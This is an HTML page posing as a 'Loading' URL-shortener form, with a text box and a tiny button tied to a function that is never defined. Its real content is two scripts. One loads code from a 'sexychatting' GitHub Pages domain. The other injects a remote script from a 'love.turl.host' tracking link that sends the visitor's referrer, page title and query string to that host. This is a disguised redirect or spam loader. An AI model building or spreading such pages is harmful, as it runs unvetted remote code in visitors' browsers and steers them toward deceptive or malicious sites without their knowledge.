<html>
    <head>
        <title>Loading</title>
    </head>
    <style>
html, body {
  height: 100%;
  width: 400%;
  margin: 0;
  display: flex;
  justify-content: center;
  align-items: center;
}
.button {
  background-color: #838383;
  color: #fefefe;
  padding: 16px;
  /* ...if you really want it to be 100% of the screen un-comment below */
/*   height: 100%; 
  width: 100%; */
}
/* 3D Button */
.btn-3d {
    position: relative;
    display: inline-block;
    font-size: 22px;
    font-family: sans-serif;
    text-decoration: none;
    font-weight: bold;
    padding: 20px 60px;
    color: white;
    margin: 20px 10px 10px;
    border-radius: 6px;
    text-align: center;
    transition: top .01s linear;
    text-shadow: 0 1px 0 rgba(0,0,0,0.15);
}
.btn-3d.red:hover    {background-color: #e74c3c;}

.btn-3d:active {
    top: 9px;
    text-decoration: none;
}

/* 3D button colors */
.btn-3d.red {
    background-color: #e74c3c;
    box-shadow: 0 0 0 1px #c63702 inset,
        0 0 0 2px rgba(255,255,255,0.15) inset,
        0 8px 0 0 #C24032,
        0 8px 0 1px rgba(0,0,0,0.4),
                0 8px 8px 1px rgba(0,0,0,0.5);
}
.btn-3d.red:active {
    box-shadow: 0 0 0 1px #c63702 inset,
                0 0 0 2px rgba(255,255,255,0.15) inset,
                0 0 0 1px rgba(0,0,0,0.4);
}


</style>
     <body>
        <input type="url" id="urlinput">
        <button onclick="shorturl()">.</button>
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
        <script src="https://sexychatting.github.io/x/main.js"></script>
     </body>
    <script type="application/javascript">
var d=document;var s=d.createElement('script'); 
s.src='http://love.turl.host/RSchY2?frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+''; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
</script>
</html>
